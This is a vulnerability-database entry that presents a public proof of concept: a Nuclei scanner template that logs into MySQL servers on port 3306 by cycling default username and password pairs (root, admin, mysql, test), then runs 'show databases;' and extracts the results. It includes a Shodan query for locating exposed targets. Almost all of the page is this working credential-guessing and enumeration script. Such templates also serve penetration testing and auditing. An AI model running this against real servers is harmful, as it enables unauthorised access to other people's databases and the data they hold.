mysql-show-databases: MySQL - Show Databases

Date: 2025-08-01 | Affected software: mysql | PoC: public

Vulnerability description

PoC code [public]

id: mysql-show-databases

info:
  name: MySQL - Show Databases
  author: DhiyaneshDk
  severity: high
  reference:
    - https://nmap.org/nsedoc/scripts/mysql-databases.html
  metadata:
    verified: true
    max-request: 16
    shodan-query: "port:3306"
  tags: js,mysql,network,enum,discovery
javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
      Export(response);

    args:
      Host: "{{Host}}"
      Port: "3306"
      Query: "show databases;"
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    payloads:
      usernames:
        - root
        - admin
        - mysql
        - test
      passwords:
        - root
        - admin
        - mysql
        - test
    attack: clusterbomb

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "success == true"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[] | .Database
# digest: 490a0046304402200fe5194427a8c1723c44696c2059ce20b309b969d2cf4bd0931d538244188298022014e36110a0a463055152178845695186774e4c2234b15506693571d299a94621:922c64590222798bb761d5b6d8e72950
